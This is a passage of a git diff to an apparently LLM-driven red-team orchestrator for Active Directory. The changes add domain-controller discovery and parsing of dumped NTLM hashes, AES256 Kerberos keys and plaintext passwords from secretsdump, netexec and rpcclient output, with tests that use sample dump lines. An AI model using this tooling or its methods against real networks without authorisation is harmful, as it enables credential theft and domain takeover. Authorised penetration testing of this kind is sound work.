DC's LDAP rootDSE (`defaultNamingContext`) to discover which + // domain it serves. This eliminates the race condition where + // automation tasks fire before recon discovers child-domain DCs + // (e.g. child.contoso.local at 192.168.58.11 vs the parent + // contoso.local at 192.168.58.10). if state.domain_controllers.is_empty() { - let dc_ip = bootstrap::probe_dc_port(&config.target_ips).await; - if let Some(ref ip) = dc_ip { + let dc_map = bootstrap::discover_dc_domains(&config.target_ips, &domain).await; + + if !dc_map.is_empty() { let dc_key = format!( "{}:{}:{}", ares_core::state::KEY_PREFIX, state.operation_id, ares_core::state::KEY_DC_MAP, ); + let domain_key = format!("ares:op:{}:domains", state.operation_id); let mut conn = queue.connection(); + + for (dc_domain, dc_ip) in &dc_map { + let _: Result<(), _> = + redis::AsyncCommands::hset(&mut conn, &dc_key, dc_domain, dc_ip).await; + state + .domain_controllers + .insert(dc_domain.clone(), dc_ip.clone()); + + // Add discovered domains to the domains list so automation + // tasks can enumerate them (AS-REP roast, BloodHound, etc.) + if !state.domains.contains(dc_domain) { + state.domains.push(dc_domain.clone()); + let _: Result<(), _> = + redis::AsyncCommands::sadd(&mut conn, &domain_key, dc_domain).await; + } + + info!( + domain = %dc_domain, + dc_ip = %dc_ip, + "Seeded domain controller from bootstrap DC discovery" + ); + } + let _: Result<(), _> = - redis::AsyncCommands::hset(&mut conn, &dc_key, &domain, ip).await; - state.domain_controllers.insert(domain.clone(), ip.clone()); - info!( - domain = %domain, - dc_ip = %ip, - "Seeded domain controller from target IPs (port 88 probe)" - ); + redis::AsyncCommands::expire(&mut conn, &domain_key, 86400i64).await; - // Also register the credential's domain (may differ from target_domain, - // e.g., child.contoso.local vs contoso.local). - // This ensures automation tasks (spray, kerberoast) can find a DC - // for the credential's domain. + // Also register the credential's domain if not already mapped. + // The credential domain may differ from any discovered DC domain + // (e.g. if the credential is for a domain whose DC is behind a + // firewall and didn't respond to probes). if let Some(ref cred) = config.initial_credential { let cred_domain = cred.domain.to_lowercase(); - if cred_domain != domain && !cred_domain.is_empty() { - let _: Result<(), _> = - redis::AsyncCommands::hset(&mut conn, &dc_key, &cred_domain, ip) - .await; + if !cred_domain.is_empty() + && !state.domain_controllers.contains_key(&cred_domain) + { + // Use the first discovered DC as fallback for the + // credential's domain — better than no mapping at all. + let fallback_ip = &dc_map[0].1; + let _: Result<(), _> = redis::AsyncCommands::hset( + &mut conn, + &dc_key, + &cred_domain, + fallback_ip, + ) + .await; state .domain_controllers - .insert(cred_domain.clone(), ip.clone()); - // Also add this domain to the domains set + .insert(cred_domain.clone(), fallback_ip.clone()); if !state.domains.contains(&cred_domain) { state.domains.push(cred_domain.clone()); - let domain_key = format!("ares:op:{}:domains", state.operation_id); let _: Result<(), _> = redis::AsyncCommands::sadd( &mut conn, &domain_key, @@ -199,8 +231,8 @@ async fn run_inner() -> Result<()> { } info!( cred_domain = %cred_domain, - dc_ip = %ip, - "Also registered credential domain in DC map" + dc_ip = %fallback_ip, + "Registered credential domain with fallback DC" ); } } @@ -312,18 +344,24 @@ async fn run_inner() -> Result<()> { let tool_disp: Arc = if std::env::var("ARES_TOOL_DISPATCH").as_deref() == Ok("local") { info!("Tool dispatch: local (in-process via ares-tools)"); - Arc::new(tool_dispatcher::LocalToolDispatcher::new( - queue.clone(), - config.operation_id.clone(), - auth_throttle.clone(), - )) + Arc::new( + tool_dispatcher::LocalToolDispatcher::new( + queue.clone(), + config.operation_id.clone(), + auth_throttle.clone(), + ) + .with_state(shared_state.clone()), + ) } else { info!("Tool dispatch: Redis queue (ares:tool_exec:{{role}})"); - Arc::new(tool_dispatcher::RedisToolDispatcher::new( - queue.clone(), - config.operation_id.clone(), - auth_throttle.clone(), - )) + Arc::new( + tool_dispatcher::RedisToolDispatcher::new( + queue.clone(), + config.operation_id.clone(), + auth_throttle.clone(), + ) + .with_state(shared_state.clone()), + ) }; // Build sorted technique priorities for the LLM system prompt. @@ -342,6 +380,7 @@ async fn run_inner() -> Result<()> { shared_state.clone(), config.strategy.llm_temperature, technique_priorities, + config.listener_ip.clone(), )); info!( model = %model_name, @@ -378,6 +417,7 @@ async fn run_inner() -> Result<()> { queue.clone(), registry.clone(), tracker.clone(), + dispatcher.credential_inflight.clone(), config.clone(), shutdown_rx.clone(), ); @@ -385,6 +425,7 @@ async fn run_inner() -> Result<()> { let (_result_handle, mut result_rx) = spawn_result_consumer( queue.clone(), tracker.clone(), + dispatcher.credential_inflight.clone(), config.clone(), shutdown_rx.clone(), ); @@ -399,6 +440,17 @@ async fn run_inner() -> Result<()> { let cost_handle = spawn_cost_summary(queue.clone(), config.clone(), shutdown_rx.clone()); + // Candidate-domain probe worker — verifies hostname-inferred domains + // (e.g. `corp.example.com` derived from `host.corp.example.com`) via + // `_ldap._tcp.dc._msdcs.` SRV lookups before promoting them. + let probe_ctx = state::domain_probe::DomainProbeContext { + state: shared_state.clone(), + queue: queue.clone(), + prober: Arc::new(state::domain_probe::DnsSrvProber::from_system()), + }; + let probe_handle = + state::domain_probe::spawn_domain_probe_worker(probe_ctx, shutdown_rx.clone()); + // Exploitation workflow let exploit_disp = dispatcher.clone(); let exploit_shutdown = shutdown_rx.clone(); @@ -621,6 +673,7 @@ async fn run_inner() -> Result<()> { let (_new_handle, new_rx) = spawn_result_consumer( queue.clone(), tracker.clone(), + dispatcher.credential_inflight.clone(), config.clone(), shutdown_rx.clone(), ); @@ -665,6 +718,7 @@ async fn run_inner() -> Result<()> { hb_handle, deferred_handle, cost_handle, + probe_handle, exploit_handle, disc_handle, refresh_handle, diff --git a/ares-cli/src/orchestrator/monitoring.rs b/ares-cli/src/orchestrator/monitoring.rs index a6e93321..3189a9f5 100644 --- a/ares-cli/src/orchestrator/monitoring.rs +++ b/ares-cli/src/orchestrator/monitoring.rs @@ -13,6 +13,7 @@ use tokio::sync::watch; use tracing::{debug, info, warn}; use crate::orchestrator::config::OrchestratorConfig; +use crate::orchestrator::dispatcher::CredentialInflight; use crate::orchestrator::routing::ActiveTaskTracker; use crate::orchestrator::task_queue::TaskQueue; @@ -193,6 +194,7 @@ pub fn spawn_heartbeat_monitor( queue: TaskQueue, registry: AgentRegistry, tracker: ActiveTaskTracker, + credential_inflight: CredentialInflight, config: Arc, mut shutdown: watch::Receiver, ) -> tokio::task::JoinHandle<()> { @@ -227,7 +229,9 @@ pub fn spawn_heartbeat_monitor( consecutive_failures = 0; // Clean up stale tasks (salvage any pending results first) - if let Err(e) = cleanup_stale_tasks(&tracker, &queue, &config).await { + if let Err(e) = + cleanup_stale_tasks(&tracker, &queue, &credential_inflight, &config).await + { warn!(err = %e, "Stale task cleanup failed"); } } @@ -282,6 +286,7 @@ async fn run_heartbeat_sweep( async fn cleanup_stale_tasks( tracker: &ActiveTaskTracker, queue: &TaskQueue, + credential_inflight: &CredentialInflight, config: &OrchestratorConfig, ) -> Result<()> { let llm_count = tracker.llm_task_count().await; @@ -317,7 +322,16 @@ async fn cleanup_stale_tasks( "Removing stale task" ); } - tracker.remove(&task.task_id).await; + // Release the per-credential inflight slot if the stale task held + // one. Without this the slot leaks: the spawned LLM future may + // still be running long after the task was declared stale, and + // every subsequent task with the same credential gets deferred + // until the future eventually returns. + if let Some(removed) = tracker.remove(&task.task_id).await { + if let Some(ref key) = removed.credential_key { + credential_inflight.release(key).await; + } + } } if !stale.is_empty() { @@ -344,7 +358,7 @@ pub(crate) const CRITICAL_TOOLS: &[(&str, &[&str])] = &[ ), ("privesc", &["impacket-findDelegation", "impacket-getST"]), ( - "lateral", + "lateral_movement", &[ "impacket-psexec", "impacket-smbexec", @@ -353,38 +367,67 @@ pub(crate) const CRITICAL_TOOLS: &[(&str, &[&str])] = &[ ), ]; -/// Query Redis for each worker's tool inventory and report any missing -/// critical tools. Returns a list of (role, missing_tools) pairs. +/// Check if a binary is available on the local PATH. +async fn is_in_path(binary: &str) -> bool { + tokio::process::Command::new("which") + .arg(binary) + .stdout(std::process::Stdio::null()) + .stderr(std::process::Stdio::null()) + .status() + .await + .is_ok_and(|s| s.success()) +} + +/// Report any missing critical tools per role. +/// +/// In local-dispatch mode (`ARES_TOOL_DISPATCH=local`) there are no separate +/// worker processes publishing inventory to Redis, so we probe the local +/// PATH directly. In remote mode we read each worker's published inventory +/// from `ares:tools:ares-{role}-agent`. pub(crate) async fn preflight_tool_check( conn: &mut redis::aio::ConnectionManager, ) -> Vec<(String, Vec)> { use redis::AsyncCommands; + let local_dispatch = std::env::var("ARES_TOOL_DISPATCH").as_deref() == Ok("local"); let mut problems = Vec::new(); for &(role, critical) in CRITICAL_TOOLS { - let agent_key = format!("ares:tools:ares-{role}-agent"); - let available: Vec = match conn.get::<_, Option>(&agent_key).await { - Ok(Some(json)) => serde_json::from_str(&json).unwrap_or_default(), - _ => { - // No inventory published yet — worker may not have started - warn!( - role = role, - "No tool inventory found — worker may not be running" - ); - problems.push(( - role.to_string(), - critical.iter().map(|s| s.to_string()).collect(), - )); - continue; + let missing: Vec = if local_dispatch { + let mut out = Vec::new(); + for &tool in critical { + if !is_in_path(tool).await { + out.push(tool.to_string()); + } } - }; + out + } else { + // Worker publishes inventory under hyphenated agent name + // (see ares-cli/src/worker/config.rs: agent_name = format!("ares-{}-agent", role.replace('_', "-"))). + // Mirror that here so role names with underscores resolve correctly. + let agent_key = format!("ares:tools:ares-{}-agent", role.replace('_', "-")); + let available: Vec = match conn.get::<_, Option>(&agent_key).await { + Ok(Some(json)) => serde_json::from_str(&json).unwrap_or_default(), + _ => { + // No inventory published yet — worker may not have started + warn!( + role = role, + "No tool inventory found — worker may not be running" + ); + problems.push(( + role.to_string(), + critical.iter().map(|s| s.to_string()).collect(), + )); + continue; + } + }; - let missing: Vec = critical - .iter() - .filter(|&&tool| !available.iter().any(|a| a == tool)) - .map(|s| s.to_string()) - .collect(); + critical + .iter() + .filter(|&&tool| !available.iter().any(|a| a == tool)) + .map(|s| s.to_string()) + .collect() + }; if !missing.is_empty() { problems.push((role.to_string(), missing)); @@ -545,7 +588,7 @@ mod tests { #[test] fn critical_tools_have_valid_roles() { - let known_roles = ["recon", "credential_access", "privesc", "lateral"]; + let known_roles = ["recon", "credential_access", "privesc", "lateral_movement"]; for &(role, tools) in CRITICAL_TOOLS { assert!( known_roles.contains(&role), @@ -568,6 +611,14 @@ mod tests { } } + #[tokio::test] + async fn is_in_path_finds_which_itself() { + // `which` is on PATH on every dev box and CI; a nonsense binary is not. + // Used by the local-dispatch branch of preflight_tool_check. + assert!(is_in_path("which").await); + assert!(!is_in_path("nonexistent_binary_for_preflight_xyz_123").await); + } + #[test] fn critical_tools_secretsdump_in_cred_and_lateral() { // secretsdump is critical for both credential_access and lateral @@ -578,7 +629,7 @@ mod tests { .unwrap_or(false); let has_lateral = CRITICAL_TOOLS .iter() - .find(|&&(r, _)| r == "lateral") + .find(|&&(r, _)| r == "lateral_movement") .map(|&(_, tools)| tools.contains(&"impacket-secretsdump")) .unwrap_or(false); assert!(has_cred); diff --git a/ares-cli/src/orchestrator/output_extraction/hashes.rs b/ares-cli/src/orchestrator/output_extraction/hashes.rs index 2979d432..a8fc5937 100644 --- a/ares-cli/src/orchestrator/output_extraction/hashes.rs +++ b/ares-cli/src/orchestrator/output_extraction/hashes.rs @@ -29,10 +29,73 @@ static RE_NTLM_PARTIAL: LazyLock = static RE_NTLM_CONTINUATION: LazyLock = LazyLock::new(|| Regex::new(r"^[a-fA-F0-9]+:::$").unwrap()); +// AES256 trust/account key from secretsdump: +// DOMAIN\\user:aes256-cts-hmac-sha1-96: +// domain.local/user:aes256-cts-hmac-sha1-96: +// user:aes256-cts-hmac-sha1-96: +static RE_AES256_KEY: LazyLock = LazyLock::new(|| { + Regex::new(r"(?:[^\\/\s:]+[\\/])?([^:\s\\/]+):aes256-cts-hmac-sha1-96:([a-fA-F0-9]+)").unwrap() +}); + +// $MACHINE.ACC markers reveal the dump's source domain (NetBIOS prefix): +// CHILD\DC01$:aes256-cts-hmac-sha1-96: +// CHILD\DC01$:plain_password_hex: +// CHILD\DC01$:aad3...:::: +// The captured prefix authoritatively identifies the dump's actual domain, +// which may differ from the task's params.domain (e.g. a cross-forest task +// targeting fabrikam.local that ended up dumping a child DC). +static RE_MACHINE_ACCT_DOMAIN: LazyLock = LazyLock::new(|| { + Regex::new( + r"(?m)^([A-Za-z0-9_-]+)\\[A-Za-z0-9_.-]+\$:(?:aes256-cts-hmac-sha1-96|aes128-cts-hmac-sha1-96|plain_password_hex|des-cbc-md5|aad3b435b51404eeaad3b435b51404ee:[a-fA-F0-9]{32}:::)", + ) + .unwrap() +}); + pub fn extract_hashes(output: &str, default_domain: &str) -> Vec { let mut hashes = Vec::new(); let mut seen = std::collections::HashSet::new(); + // Pre-scan for AES256 keys; these are emitted on separate lines from the + // NTLM hash by impacket-secretsdump. Win2016+ DCs reject RC4-only + // inter-realm tickets (KDC_ERR_TGT_REVOKED), so we attach the AES256 key + // to the matching Hash entry by username. + let mut aes_by_user: std::collections::HashMap = + std::collections::HashMap::new(); + for caps in RE_AES256_KEY.captures_iter(output) { + let user = caps.get(1).unwrap().as_str().to_lowercase(); + let aes = caps.get(2).unwrap().as_str().to_lowercase(); + aes_by_user.insert(user, aes); + } + + // Detect the dump's actual NetBIOS domain from $MACHINE.ACC markers. + // If found and it conflicts with default_domain (the task's params.domain), + // we suppress plain-format NTLM lines to prevent phantom mislabels — the + // discoveries blob from the tool's own parser will have already captured + // these hashes with the correct domain. + let default_netbios = default_domain + .split('.') + .next() + .unwrap_or("") + .to_lowercase(); + let mut detected_netbios: Option = None; + let mut detected_ambiguous = false; + for caps in RE_MACHINE_ACCT_DOMAIN.captures_iter(output) { + let nb = caps.get(1).unwrap().as_str().to_lowercase(); + match detected_netbios { + None => detected_netbios = Some(nb), + Some(ref existing) if *existing == nb => {} + Some(_) => { + detected_ambiguous = true; + break; + } + } + } + let suppress_plain_ntlm = !detected_ambiguous + && !default_netbios.is_empty() + && detected_netbios + .as_deref() + .is_some_and(|nb| nb != default_netbios); + // First pass: unwrap line-wrapped NTLM hashes let lines: Vec<&str> = output.lines().collect(); let mut unwrapped: Vec = Vec::new(); @@ -72,7 +135,7 @@ pub fn extract_hashes(output: &str, default_domain: &str) -> Vec { discovered_at: Some(chrono::Utc::now()), parent_id: None, attack_step: 0, - aes_key: None, + aes_key: aes_by_user.get(&username.to_lowercase()).cloned(), }); } continue; @@ -100,7 +163,7 @@ pub fn extract_hashes(output: &str, default_domain: &str) -> Vec { discovered_at: Some(chrono::Utc::now()), parent_id: None, attack_step: 0, - aes_key: None, + aes_key: aes_by_user.get(&username.to_lowercase()).cloned(), }); } continue; @@ -126,7 +189,7 @@ pub fn extract_hashes(output: &str, default_domain: &str) -> Vec { discovered_at: Some(chrono::Utc::now()), parent_id: None, attack_step: 0, - aes_key: None, + aes_key: aes_by_user.get(&username.to_lowercase()).cloned(), }); } continue; @@ -134,6 +197,13 @@ pub fn extract_hashes(output: &str, default_domain: &str) -> Vec { // NTLM without domain prefix if let Some(caps) = RE_NTLM_PLAIN.captures(line) { + // Skip plain NTLM lines when the dump came from a domain that + // differs from default_domain — applying default_domain would + // create phantom entries (e.g. fabrikam.local:krbtgt mislabel of + // a child DC dump done under a cross-forest task). + if suppress_plain_ntlm { + continue; + } let username = caps.get(1).unwrap().as_str(); let lm = caps.get(3).unwrap().as_str(); let nt = caps.get(4).unwrap().as_str(); @@ -155,7 +225,7 @@ pub fn extract_hashes(output: &str, default_domain: &str) -> Vec { discovered_at: Some(chrono::Utc::now()), parent_id: None, attack_step: 0, - aes_key: None, + aes_key: aes_by_user.get(&username.to_lowercase()).cloned(), }); } } @@ -362,6 +432,82 @@ mod tests { assert!(extract_hashes("", "CONTOSO").is_empty()); } + #[test] + fn extract_hashes_suppresses_plain_ntlm_on_domain_mismatch() { + // Regression test for Bug F: a cross-forest task with default_domain=fabrikam.local + // dumped a CHILD DC (dc01). The output's $MACHINE.ACC marker + // (CHILD\DC01$:aes256-...) reveals the real domain is CHILD, so plain + // NTLM lines (krbtgt:502:..., Administrator:500:...) must NOT be labeled fabrikam.local. + let output = "\ +Administrator:500:aad3b435b51404eeaad3b435b51404ee:2e993405ab82e4454afc9c9bb0939a25::: +[*] $MACHINE.ACC +CHILD\\DC01$:aes256-cts-hmac-sha1-96:583938786f0a9459ced10e35f5803be6d4017c6fd4ba21b6e7479f9bce851d6b +CHILD\\DC01$:aad3b435b51404eeaad3b435b51404ee:a3f11b5a18f97db9a3d4f16aed85a1b6::: +krbtgt:502:aad3b435b51404eeaad3b435b51404ee:8c6d94541dbc90f085e86828428d2cbf::: +krbtgt:aes256-cts-hmac-sha1-96:86eebe21a5af32061e42ef050c447d4467648e54884a92d91a3f97fbfa0114a4"; + let hashes = extract_hashes(output, "fabrikam.local"); + // Plain NTLM lines must be suppressed — no hashes should carry the + // mismatched fabrikam.local label. + let labeled_fabrikam: Vec<_> = hashes + .iter() + .filter(|h| h.domain.eq_ignore_ascii_case("fabrikam.local")) + .collect(); + assert!( + labeled_fabrikam.is_empty(), + "no hashes should be labeled fabrikam.local when dump is from CHILD" + ); + // The phantom mislabel was specifically of krbtgt and Administrator — + // make sure neither slipped through with the wrong domain. + assert!( + !hashes.iter().any(|h| h.username == "krbtgt"), + "plain-format krbtgt must be suppressed on domain mismatch" + ); + assert!( + !hashes + .iter() + .any(|h| h.username.eq_ignore_ascii_case("Administrator")), + "plain-format Administrator must be suppressed on domain mismatch" + ); + } + + #[test] + fn extract_hashes_keeps_plain_ntlm_when_domain_matches() { + // When default_domain matches the detected NetBIOS prefix, plain NTLM + // lines are still extracted (the common case: a domain-targeted task). + let output = "\ +Administrator:500:aad3b435b51404eeaad3b435b51404ee:2e993405ab82e4454afc9c9bb0939a25::: +CHILD\\DC01$:aes256-cts-hmac-sha1-96:5839387800000000000000000000000000000000000000000000000000000000 +krbtgt:502:aad3b435b51404eeaad3b435b51404ee:8c6d94541dbc90f085e86828428d2cbf:::"; + let hashes = extract_hashes(output, "child.contoso.local"); + assert!(hashes.iter().any(|h| h.username == "krbtgt")); + assert!(hashes.iter().any(|h| h.username == "Administrator")); + } + + #[test] + fn extract_hashes_keeps_plain_ntlm_when_no_machine_acct_marker() { + // When the output has no $MACHINE.ACC marker, fall back to default_domain + // (we have no signal to override). This preserves the existing behavior + // for partial outputs and non-secretsdump tools. + let output = "Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::"; + let hashes = extract_hashes(output, "contoso.local"); + assert_eq!(hashes.len(), 1); + assert_eq!(hashes[0].domain, "contoso.local"); + } + + #[test] + fn extract_hashes_attaches_aes256_to_trust_account() { + let output = "\ +FABRIKAM\\CONTOSO$:1107:aad3b435b51404eeaad3b435b51404ee:33333333333333333333333333333333::: +FABRIKAM\\CONTOSO$:aes256-cts-hmac-sha1-96:4444444444444444444444444444444444444444444444444444444444444444"; + let hashes = extract_hashes(output, "fabrikam.local"); + assert_eq!(hashes.len(), 1); + assert_eq!(hashes[0].username, "CONTOSO$"); + assert_eq!( + hashes[0].aes_key.as_deref(), + Some("4444444444444444444444444444444444444444444444444444444444444444") + ); + } + #[test] fn extract_cracked_passwords_hashcat_tgs() { let output = "$krb5tgs$23$*svc_sql$CONTOSO.LOCAL$MSSQLSvc/db01*$aabb$ccdd:Summer2024!"; diff --git a/ares-cli/src/orchestrator/output_extraction/hosts.rs b/ares-cli/src/orchestrator/output_extraction/hosts.rs index f61053dc..f20fd7b6 100644 --- a/ares-cli/src/orchestrator/output_extraction/hosts.rs +++ b/ares-cli/src/orchestrator/output_extraction/hosts.rs @@ -56,9 +56,23 @@ pub fn extract_hosts(output: &str) -> Vec { .map(|c| c.get(1).unwrap().as_str().trim().to_string()) .unwrap_or_default(); + // Synthesize FQDN as `.`, but reject workgroup-only + // hosts where impacket reports the machine's NetBIOS name as the + // first label of the "domain" field (e.g. + // `(name:WIN-X) (domain:WIN-X.GXM0.LOCAL)` from a non-domain-joined + // Windows box). Without this guard we synthesize + // `win-x.win-x.gxm0.local` and `publish_host` then extracts the + // junk suffix `win-x.gxm0.local` into `state.domains`. let hostname = if !netbios_name.is_empty() && !domain.is_empty() && !netbios_name.contains('.') { - format!("{}.{}", netbios_name.to_lowercase(), domain.to_lowercase()) + let nb = netbios_name.to_lowercase(); + let dom = domain.to_lowercase(); + let workgroup_self = dom == nb || dom.starts_with(&format!("{}.", nb)); + if workgroup_self { + netbios_name + } else { + format!("{nb}.{dom}") + } } else { netbios_name }; @@ -162,6 +176,20 @@ SMB 192.168.58.10 445 DC01 [*] Windows Server (name:DC01) (domain:contoso.l assert!(extract_hosts("").is_empty()); } + #[test] + fn extract_workgroup_self_domain_does_not_duplicate_netbios() { + // Workgroup-only Windows hosts often report their own NetBIOS name as + // the first label of the SMB "domain" field. We must NOT synthesize + // `win-x.win-x.gxm0.local`; use the bare NetBIOS name instead so the + // junk suffix never reaches `state.domains`. + let output = "SMB 192.168.58.30 445 WIN-E4G4GC587O4 [*] Windows Server 2003 \ + (name:WIN-E4G4GC587O4) (domain:WIN-E4G4GC587O4.GXM0.LOCAL) (signing:False)"; + let hosts = extract_hosts(output); + assert_eq!(hosts.len(), 1); + assert_eq!(hosts[0].hostname, "WIN-E4G4GC587O4"); + assert!(!hosts[0].hostname.contains('.')); + } + #[test] fn extract_multiple_hosts() { let output = "\ diff --git a/ares-cli/src/orchestrator/output_extraction/mod.rs b/ares-cli/src/orchestrator/output_extraction/mod.rs index 533af753..a583c97e 100644 --- a/ares-cli/src/orchestrator/output_extraction/mod.rs +++ b/ares-cli/src/orchestrator/output_extraction/mod.rs @@ -54,22 +54,70 @@ impl TextExtractions { } } +/// Tool-call context paired with stdout, used by `extract_from_output_text` +/// to gate noisy regexes on the invoking tool's arguments. +/// +/// `arguments` is best-effort: when None (e.g. legacy bare-string tool_outputs +/// payloads), extractors fall back to the untyped behavior they had before this +/// struct was introduced. +pub struct ToolOutputCtx<'a> { + pub arguments: Option<&'a serde_json::Value>, + pub output: &'a str, +} + +impl<'a> ToolOutputCtx<'a> { + /// Returns true when the invoking arguments indicate the tool was authenticated + /// with a hash rather than a plaintext password. Tools like nxc/netexec echo the + /// supplied secret back on success lines (`[+] DOMAIN\user:secret (Pwn3d!)`), + /// so a hash-auth invocation produces a hash where credential regexes expect a + /// password. Extractors must short-circuit `password` regexes for these calls. + pub(crate) fn is_hash_auth(&self) -> bool { + let Some(args) = self.arguments else { + return false; + }; + let Some(obj) = args.as_object() else { + return false; + }; + for (k, v) in obj { + let key = k.to_lowercase(); + // Common spellings across our tool wrappers (nxc, impacket-*, etc.) + let is_hash_key = matches!( + key.as_str(), + "hash" | "hashes" | "nthash" | "lmhash" | "ntlm_hash" | "nt_hash" | "lm_hash" + ); + if !is_hash_key { + continue; + } + let nonempty = match v { + serde_json::Value::String(s) => !s.trim().is_empty(), + serde_json::Value::Array(a) => !a.is_empty(), + serde_json::Value::Null => false, + _ => true, + }; + if nonempty { + return true; + } + } + false + } +} + /// Extract all discoverable entities from raw output text. /// /// Runs all extraction passes and returns the combined results. -pub fn extract_from_output_text(output: &str, default_domain: &str) -> TextExtractions { +pub fn extract_from_output_text(ctx: &ToolOutputCtx<'_>, default_domain: &str) -> TextExtractions { let mut result = TextExtractions::default(); - if output.is_empty() { + if ctx.output.is_empty() { return result; } - result.hosts = extract_hosts(output); - result.users = extract_users(output, default_domain); - result.credentials = extract_plaintext_passwords(output, default_domain); - result.shares = extract_shares(output); - result.hashes = extract_hashes(output, default_domain); + result.hosts = extract_hosts(ctx.output); + result.users = extract_users(ctx.output, default_domain); + result.credentials = extract_plaintext_passwords(ctx, default_domain); + result.shares = extract_shares(ctx.output); + result.hashes = extract_hashes(ctx.output, default_domain); - let cracked = extract_cracked_passwords(output, default_domain); + let cracked = extract_cracked_passwords(ctx.output, default_domain); result.credentials.extend(cracked); result @@ -244,7 +292,48 @@ mod unit_tests { #[test] fn extract_from_output_text_empty() { - let result = extract_from_output_text("", "contoso.local"); + let ctx = ToolOutputCtx { + arguments: None, + output: "", + }; + let result = extract_from_output_text(&ctx, "contoso.local"); assert!(result.is_empty()); } + + #[test] + fn is_hash_auth_detects_common_keys() { + let args = serde_json::json!({"hashes": "aad3:abcd"}); + let ctx = ToolOutputCtx { + arguments: Some(&args), + output: "", + }; + assert!(ctx.is_hash_auth()); + + let args = serde_json::json!({"nthash": "abcd"}); + let ctx = ToolOutputCtx { + arguments: Some(&args), + output: "", + }; + assert!(ctx.is_hash_auth()); + + let args = serde_json::json!({"hashes": ""}); + let ctx = ToolOutputCtx { + arguments: Some(&args), + output: "", + }; + assert!(!ctx.is_hash_auth()); + + let args = serde_json::json!({"password": "P@ss"}); + let ctx = ToolOutputCtx { + arguments: Some(&args), + output: "", + }; + assert!(!ctx.is_hash_auth()); + + let ctx = ToolOutputCtx { + arguments: None, + output: "", + }; + assert!(!ctx.is_hash_auth()); + } } diff --git a/ares-cli/src/orchestrator/output_extraction/passwords.rs b/ares-cli/src/orchestrator/output_extraction/passwords.rs index 2d06a50a..083d65b9 100644 --- a/ares-cli/src/orchestrator/output_extraction/passwords.rs +++ b/ares-cli/src/orchestrator/output_extraction/passwords.rs @@ -31,10 +31,82 @@ static RE_NETEXEC_SUCCESS: LazyLock = LazyLock::new(|| { Regex::new(r"\[\+\]\s+([A-Za-z0-9_.\-]+)\\([A-Za-z0-9_.\-$]+):([^\s(]+)").unwrap() }); -pub fn extract_plaintext_passwords(output: &str, default_domain: &str) -> Vec { +/// Regex for rpcclient `queryuser` output: `User Name :\tjdoe` +static RE_RPC_USER_NAME: LazyLock = + LazyLock::new(|| Regex::new(r"(?i)^\s*User\s+Name\s*:\s*(\S+)").unwrap()); + +/// Extract credentials from rpcclient queryuser blocks where "User Name" and +/// "Description" (containing a password) appear on separate lines. +/// +/// This is safe because rpcclient queryuser output is deterministic: attributes +/// always belong to the same user within a single query response block. +fn extract_rpcclient_description_passwords( + output: &str, + default_domain: &str, + seen: &mut std::collections::HashSet, +) -> Vec { + let mut credentials = Vec::new(); + let mut current_user: Option = None; + + for line in output.lines() { + let stripped = line.trim(); + // Track the current user from "User Name : xxx" + if let Some(caps) = RE_RPC_USER_NAME.captures(stripped) { + current_user = Some(caps.get(1).unwrap().as_str().to_string()); + continue; + } + // Empty line or new block separator resets user context + if stripped.is_empty() { + current_user = None; + continue; + } + // Look for password in Description field + if let Some(ref username) = current_user { + if stripped.to_lowercase().contains("description") + && stripped.to_lowercase().contains("password") + { + if let Some(caps) = RE_PASSWORD_VALUE.captures(stripped) { + let password = caps + .get(1) + .unwrap() + .as_str() + .trim_end_matches(|c: char| ".,;:()".contains(c)) + .trim_matches('\'') + .trim_matches('"') + .to_string(); + if is_valid_credential(username, &password) { + let key = format!("{}\\{}:{}", default_domain, username, password); + if seen.insert(key) { + credentials.push(make_credential( + username, + &password, + default_domain, + "description_field", + )); + } + } + } + } + } + } + credentials +} + +pub fn extract_plaintext_passwords( + ctx: &super::ToolOutputCtx<'_>, + default_domain: &str, +) -> Vec { + let output = ctx.output; let mut credentials = Vec::new(); let mut seen = std::collections::HashSet::new(); + // First pass: extract from rpcclient queryuser blocks (multi-line) + credentials.extend(extract_rpcclient_description_passwords( + output, + default_domain, + &mut seen, + )); + const FAILURE_MARKERS: &[&str] = &[ "STATUS_LOGON_FAILURE", "STATUS_PASSWORD_EXPIRED", @@ -54,29 +126,38 @@ pub fn extract_plaintext_passwords(output: &str, default_domain: &str) -> Vec Vec Vec { + let ctx = ToolOutputCtx { + arguments: None, + output, + }; + super::passwords::extract_plaintext_passwords(&ctx, default_domain) +} + +fn extract_from_output_text(output: &str, default_domain: &str) -> TextExtractions { + let ctx = ToolOutputCtx { + arguments: None, + output, + }; + super::extract_from_output_text(&ctx, default_domain) +} + #[test] fn extract_ntlm_with_domain() { let output = @@ -349,6 +367,36 @@ SMB 192.168.58.11 445 DC02 [+] child.contoso.local\\jdoe:jdoe"; assert_eq!(result.credentials[0].source, "netexec_auth"); } +#[test] +fn extract_netexec_skips_hash_auth_echo() { + let output = + "SMB 192.168.58.11 445 DC01 [+] contoso.local\\frank:6dccf1c567c56a40e56691a723a49664 (Pwn3d!)"; + let args = serde_json::json!({"hashes": "6dccf1c567c56a40e56691a723a49664"}); + let ctx = ToolOutputCtx { + arguments: Some(&args), + output, + }; + let result = super::extract_from_output_text(&ctx, "contoso.local"); + assert!( + result.credentials.is_empty(), + "hash echo must not become a credential: {:?}", + result.credentials + ); +} + +#[test] +fn extract_netexec_password_auth_still_extracted() { + let output = "SMB 192.168.58.11 445 DC01 [+] contoso.local\\jdoe:RealPass1 (Pwn3d!)"; + let args = serde_json::json!({"password": "RealPass1"}); + let ctx = ToolOutputCtx { + arguments: Some(&args), + output, + }; + let result = super::extract_from_output_text(&ctx, "contoso.local"); + assert_eq!(result.credentials.len(), 1); + assert_eq!(result.credentials[0].password, "RealPass1"); +} + #[test] fn extract_netexec_success_with_pwned() { let output = "SMB 192.168.58.11 445 DC01 [+] contoso.local\\Administrator:P@ssw0rd(Pwn3d!)"; @@ -494,12 +542,12 @@ fn extract_cracked_tgs_john_show_unknown_user() { let output = "Loaded 1 password hash (krb5tgs)\n\ $krb5tgs$23$*john.smith$CHILD.CONTOSO.LOCAL$CIFS/filesvr01*$abcdef$123456\n\ --- john --show ---\n\ - ?:iknownothing\n\n\ + ?:P@ssw0rd!\n\n\ 1 password hash cracked, 0 left\n"; let creds = extract_cracked_passwords(output, "child.contoso.local"); assert_eq!(creds.len(), 1); assert_eq!(creds[0].username, "john.smith"); - assert_eq!(creds[0].password, "iknownothing"); + assert_eq!(creds[0].password, "P@ssw0rd!"); assert_eq!(creds[0].domain, "CHILD.CONTOSO.LOCAL"); 